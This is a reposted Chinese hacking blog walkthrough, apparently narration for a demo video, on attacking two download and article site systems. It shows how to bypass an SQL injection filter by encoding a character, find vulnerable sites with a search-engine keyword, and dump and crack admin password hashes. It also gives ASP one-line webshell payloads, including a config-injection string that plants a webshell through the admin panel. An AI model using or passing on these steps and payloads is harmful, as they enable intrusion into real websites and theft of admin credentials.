浪人下载和浪人文章的漏洞利用
鬼仔注:未测试。不知道是不是新东西,对这两个系统没什么印象。看文章内容好像是从某个动画的说明文件的内容。不知道原作者是谁。
来源:失眠ヤ夜 's blog
一个注入漏洞
大家可以快进看
先随便点一个软件下载
官方都更新到2.4了,但是还是官方自己再用,不过也有漏洞哦
把下载地址复制到明小子里面,把I改成%69
看到了吗,没有改之前是不能注入额
恭喜,该URL可以注入!
数据库类型:Access数据库
下面来讲讲关键字的搜索
下载链接若长时间无响应,请稍候再试;无法下载或是其它问题,请给我留言…..就是这一句了
在BAIDU上搜搜看
我在本机上测试的
Admin_Info
是管理员表
密码是MD5加密的,在WWW.CMD5.COM上可以解密
郁闷。。。。不知道为什么本机老跑不出来
反正我知道密码啦,下面开始拿webshell
如果你们猜的话一定可以猜出来的
本机猜出来了
有些后台是ADMIN.ASP
还有的是LOGIN.ASP
版本不同啦
后台有两种方法拿WEBSHELL
看我演示
OK,这是第一种
下面讲第二种
在网站配置信息里
插入一句话
不是光查
<%eval request("#")%>
这样是不行的
看演示
sss"%><%eval request("#")%><%ViewMessage="c
下载说明里面写上上面的一句话
我都已经写好了
http://localhost/down/Inc\Config.asp
这个是我一句话的地址
然后连接就可以了